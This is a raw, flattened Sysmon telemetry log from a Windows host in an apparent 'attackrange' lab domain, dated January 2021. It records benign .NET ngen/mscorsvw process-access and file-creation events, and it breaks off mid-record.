4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:31.471{08A6967A-451E-6000-6801-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1350-0\System.Runtime.WindowsRuntime.dll2021-01-14 13:20:31.471 10341000x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.706{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4522-6000-6E01-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.690{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4522-6000-6E01-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.690{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4522-6000-6E01-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.346{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4522-6000-6D01-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.346{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4522-6000-6D01-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:34.346{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4522-6000-6D01-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:34.190{08A6967A-451F-6000-6C01-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1050-0\System.Runtime.Serialization.dll2021-01-14 13:20:34.190 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:50.972{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4532-6000-6F01-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:50.972{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4532-6000-6F01-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:50.410{08A6967A-4522-6000-6E01-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13c4-0\System.ServiceModel.dll2021-01-14 13:20:50.410 10341000x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:51.191{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4533-6000-7001-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:51.191{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4533-6000-7001-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:51.191{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4533-6000-7001-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:50.988{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4532-6000-6F01-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:21:00.739{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0x1a031487) 11241100x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:01.817{08A6967A-4533-6000-7001-000000009A01}4392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1128-0\PresentationCore.dll2021-01-14 13:21:01.817 10341000x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.458{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-453E-6000-7201-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.442{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-453E-6000-7201-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.442{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-453E-6000-7201-000000009A01}2360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.161{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-453E-6000-7101-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.145{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-453E-6000-7101-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:02.145{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-453E-6000-7101-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454B-6000-7301-000000009A01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 